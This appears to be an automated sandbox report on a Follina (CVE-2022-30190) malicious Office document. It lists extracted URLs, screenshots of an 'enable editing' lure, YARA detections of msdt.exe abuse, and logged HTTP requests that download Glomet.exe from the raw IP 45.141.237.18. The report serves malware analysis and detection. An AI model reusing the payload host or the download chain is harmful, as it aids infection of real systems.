Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.dr String found in binary or memory: https://bugs.launchpad.net/ubuntu/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cdn.entity.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://config.edge.skype.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cortana.ai
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cortana.ai/api
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cr.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dev.cortana.ai
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://devnull.onenote.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://directory.services.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://graph.windows.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://graph.windows.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://invites.office.com/
Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.dr String found in binary or memory: https://launchpad.net/bugs/1288690
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://lifecycle.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://login.windows.local
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://management.azure.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://management.azure.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.action.office.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.engagement.office.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.office.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ncus.contentsync.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://officeapps.live.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://onedrive.live.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://osi.office.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office365.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office365.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://roaming.edog.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://settings.outlook.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://staging.cortana.ai
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://tasks.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://wus2.contentsync.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: global traffic HTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18If-Modified-Since: Thu, 14 Jul 2022 16:59:59 GMTIf-None-Match: "80119226a397d81:0"Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /icons/ubuntu-logo.png HTTP/1.1Accept: */*Referer: http://45.141.237.18/Glomet.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.141.237.18Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Glomet.exe HTTP/1.1Host: 45.141.237.18Connection: Keep-Alive
Contains functionality for read data from the clipboard
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 29_2_004054B6

System Summary
barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: enable editing" to view content ~ 0 ~ 0 4~~ - m " gm " . ~ ~ m~ ~ Wp 0 0 mb ~ "
Source: Document image extraction number: 1 Screenshot OCR: enable editing" to view content wm "
Source: Screenshot number: 16 Screenshot OCR: enable editing" to view content X Program Compatibility Troubleshooter Detecting issues Cancel
Source: Screenshot number: 20 Screenshot OCR: enable editing" to view content .. . _ ,., Page 1 of 3 0 words 112 O Type here to search m % -
Source: Screenshot number: 24 Screenshot OCR: enable editing" to view content X m Program Compatibility Troubleshooter Cancel 0 words It? O T
Source: Screenshot number: 28 Screenshot OCR: enable editing" to view content X m Program Compatibility Troubleshooter Cancel 0 words It? O T
Yara signature match
Source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: 0000000D.00000002.577239005.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: Process Memory Space: msdt.exe PID: 7084, type: MEMORYSTR Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Contains functionality to shutdown / reboot the system
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 29_2_004033B3
Detected potential crypto function
Source: C:\ProgramData\Glomet.exe Code function: 29_2_0040727F 29_2_0040727F
Source: C:\ProgramData\Glomet.exe Code function: 29_2_00406AA8 29_2_00406AA8
PE file does not import any functions
Source: api-ms-win-core-timezone-l1-1-0.dll.29.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.29.dr Static PE information: No import functions for PE file found
Source: DiagPackage.dll.13.dr Static PE information: No import functions for PE file found
